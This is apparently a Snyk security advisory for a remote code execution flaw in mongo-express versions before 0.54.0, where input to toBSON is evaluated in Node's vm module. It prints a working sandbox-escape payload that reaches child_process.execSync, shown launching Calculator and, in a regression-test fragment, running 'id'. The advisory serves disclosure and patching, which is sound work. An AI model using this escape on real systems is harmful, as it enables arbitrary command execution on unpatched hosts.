Remote Code Execution (RCE) Affecting mongo-express package, versions <0.54.0


0.0
critical

Snyk CVSS

    Attack Complexity Low
    Scope Changed
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Mature
    EPSS 97.46% (100th percentile)
NVD
9.9 critical

  • Snyk ID SNYK-JS-MONGOEXPRESS-473215
  • published 16 Oct 2019
  • disclosed 14 Oct 2019
  • credit Jonathan Leitschuh

How to fix?

Upgrade mongo-express to version 0.54.0 or higher.

Overview

mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that use the toBSON method. The user-supplied input reaching those endpoints is evaluated with the Node.js vm module, which is not a secure sandbox, so the evaluated code can escape the context and run arbitrary commands on the host.

PoC by Jonathan Leitschuh

# MacOS
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

  // Regression test fragment: passing the sandbox-escape string to toBSON must not execute `id`.
  const bson = require('../../lib/bson'); // module under test; path assumed

  it('should not be executable', function () {
    const test = `
    this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())
    `;
    const result = bson.toBSON(test); // was `calculatorTest`, an undefined variable
  });